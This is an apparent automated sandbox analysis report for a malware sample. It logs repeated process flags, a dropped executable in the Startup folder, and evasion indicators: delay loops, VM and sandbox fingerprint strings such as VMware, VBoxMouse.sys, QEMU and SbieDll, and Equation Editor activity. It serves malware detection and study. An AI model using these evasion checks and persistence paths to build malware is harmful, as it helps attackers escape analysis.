Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeSection loaded: OutputDebugStringW count: 112
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeSection loaded: OutputDebugStringW count: 212
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477 (15 entries)
Note: 922337203685477 ms is .NET's TimeSpan.MaxValue (9223372036854775807 ticks / 10000). It is how a .NET thread blocking with an infinite timeout is reported, so the powershell.exe entries with this value are a runtime artifact. The evasion evidence attributable to the sample is the sleep loops (sleep count 100, 88 and 85 against a threshold of 30) and the OutputDebugStringW loops in CTF loader_es.exe and Bw6d8Paf6bOV36xS4N6.exe, together with the VM fingerprint strings listed further down.
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2396Thread sleep time: -180000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2396Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe TID: 2392Thread sleep count: 100 > 30
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe TID: 2652Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2856Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2908Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2884Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1920Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe TID: 2372Thread sleep count: 88 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1916Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 856Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2592Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe TID: 2488Thread sleep count: 85 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2548Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2908Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1772Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2532Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2668Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 764Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeLast function: Thread delayed
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_01DB096A GetSystemInfo,
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477 (15 entries)
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | File opened: C:\Users\user\
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmp | Binary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmp | Binary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: powershell.exe, 00000007.00000002.2119619399.0000000000554000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmp | Binary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmp | Binary or memory string: VMwareVBox
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
